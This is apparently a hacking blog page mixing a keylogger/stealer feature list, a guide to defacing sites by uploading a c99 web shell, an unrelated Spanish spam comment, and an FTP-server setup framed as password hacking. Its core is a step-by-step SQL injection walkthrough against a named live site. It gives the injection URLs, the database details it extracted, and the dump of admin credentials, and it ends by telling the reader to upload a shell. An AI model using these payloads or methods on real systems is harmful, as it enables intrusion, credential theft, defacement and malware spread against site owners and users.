* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers

Steler Logs :

Sunday

Deface a Website after SQL Injection

How to deface a website after Hacking with SQL Injection

You succesfully finsihed your sql injection job congratulations.Now you know Adminname and Adminpass.
The next step is to find out the admin login pannel. You can use different tools for this job.

-Havji
-Acunetix Web Scanner

Well use this tools to get the admin login pannel. If you got the information go on and login as Admin.
Now your ordinary finish with your hack. But how to deface the page ??

You only need a shell to do. Donwload a c99 shell
From here https://rs83l3.rapidshare.com/#!download|83dt|248023722|c99.rar|40|R~E7FE4DBE09A44CD632F6E74BF84E6A63
Now upload your shell. You will see a control pannel. Now your the real master of the page

Interesante site sobre embarazo y bebes relacionada al tema

Hablando sobre este post pienso que podriais acceder a www.bebenoticias.com. Aunque no esta muy relacionado con el post y por ello creo que lo deberias mirar
Es una web sobre bebes y sobre embarazo y trata tambien muchos temas similares como enfermedades, educacion infantil, comportamiento de chiquillos...
Es una web tipo social que permite enviar articulos sobre bebes, embarazo, educacion infantil, etc y los visitantes pueden votar las que les interesan. En realidad te ahorra navegar muchas horas por blogs buscando cualquier cosa sobre bebes y embarazo. Y ademas tiene muchas actualizaciones diarias. Es fantantica la site.
Te dejo el link
http://www.bebenoticias.com/

Saturday

Today I Teach You SQL Injection Without Error of PHP and MySQL.

1. Find Vulnerable target for that use google dork.
Here is link for that :
http://www.hackforums.net/showthread.php?tid=1210804

2. Next I have found one Target :
http://cadaboutdrugs.ie/news.php?id=82

3. Check for vulnerability put (" ' ") after URL.
http://cadaboutdrugs.ie/news.php?id=82'

4.You cant find any Error Message but You notice some contents of site vanished.

5. Now try for ORDER BY syntax.
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 1--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 2--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 3--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 4--
I have tried upto 90 but I cant Find any Error.

6. Next step to Apply UNION syntax.
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6,7--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6,7,8--

7. Now at UNION SELECT 1,2,3,4,5,6,7,8-- you will see some vulnerable number on screen e.g. 2 3 4

8. Now found Version of MySQL, User, and Database Name.
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,@@version,user(),database(),5,6,7,8--

9. Now you will see the following output :
5.1.49-log ---> MySQL Version

aboutdr_admin@web8.novara.ie ---> User

aboutdr_Test ---> Database Name

10. Now found All tables name in database
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()--

11. We got our all table -->[about,carousel,contact,documents,donate,intro,links,members,news,services] in which we got our Important table which stored admin username password is --> "members"

12. Find columns names of "members" table. goto http://home2.paulschou.net/tools/xlate/ website.

13. Copy "members" without quotes into [ TEXT ] field and Press

14. Now We got the value "109 101 109 98 101 114 115" from [ DEC / CHAR ] field.

15. Now our query to find column names of members table will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=CHAR(109,101,109,98,101,114,115)--

16. Now we got all column names from members tables.-->id,username,password

17. Now find username password the query will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(id,0x3a,username,0x3a,password),3,4,5,6,7,8 FROM members--

18. Here we got id, username and password and "0x3a" stands for --> [:] (colon)

19. Now go to Home page of site Click on Admin Login. Login with username password and Upload your shell feel free to deface or upload any page.

I tried this server for root but Unfortunately its patched server so It cant be rooted.

Create An FTP Server On Your PC..

How to create an FTP Server on your computer using Ser-u,their is a cool trick for changing ur pc into server.Hack yahoo password by making servers & hack any messengers passwords.

Process 1:
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..

1.Goto no-ip & create urself a free account.
2.Now ur account been created & ll receive ur account password via mail to ur email address.

3.After getting ur password login to ur account of no-ip.com
4.After getting logged in, click upon add a HOST its on the left menu.

5.Type any hostname u want (eg:-saien) & select any domain from da given list (eg:-ftpserve.com) Click on Submit.

6.Now u have owned ur own static address (example: saien.serveftp.com)

7.Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it fromhere directly, this is for microsoft window users..

8.After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.

9.At last tick on da check box present at the static address.

10.U have ur own static web address.


Process 2:
Installation & setting of the FTP-Server
1.You have to install Serv-U 4.1.03 , download this software from here

2. Run Serv-U & use da wizard to setup ur FTP.

3.Click on next until u have been asked for IP-Address, leave it as it is & click upon next.

4.Enter ur domain name u have registered (example: rkchoolie.serveftp.com) it above in da domain field & click upon next.

5.U ll be asked for anonymous access, select No & click upon next.

6.Next u ll be asked for creating a named account, select yes & click upon next.

7.Choose any user name u wish (eg:-saien) & clcik upon next.

8.Enter password for dis account (eg:-@1254Rwn) for security purpose choose difficult password.
9.U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.

10.Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.

11.At last ur account has been created click finish.


Process 3:
Configuring the user accounts which u have been created.
1.On the left tree-menu, select da account which u have been created above & den click upon General Tab.

2.Goto Hide 'Hidden' Files.

3. Check Allow only and enter the number one in the box.
4.Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.

5.choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)

6.Click upon Dir Access Tab.

7.Now u can c home folder here.Highlight it & make ur permission.
8.If u want only users to download check only these Read,List & Inherit.
9.If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.
10.If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.

11.There r many things u can do, These are only the basics....

12. Ur server is now ready to be connected..
13. Login with ur username & password...
Related Posts Plugin for WordPress, Blogger...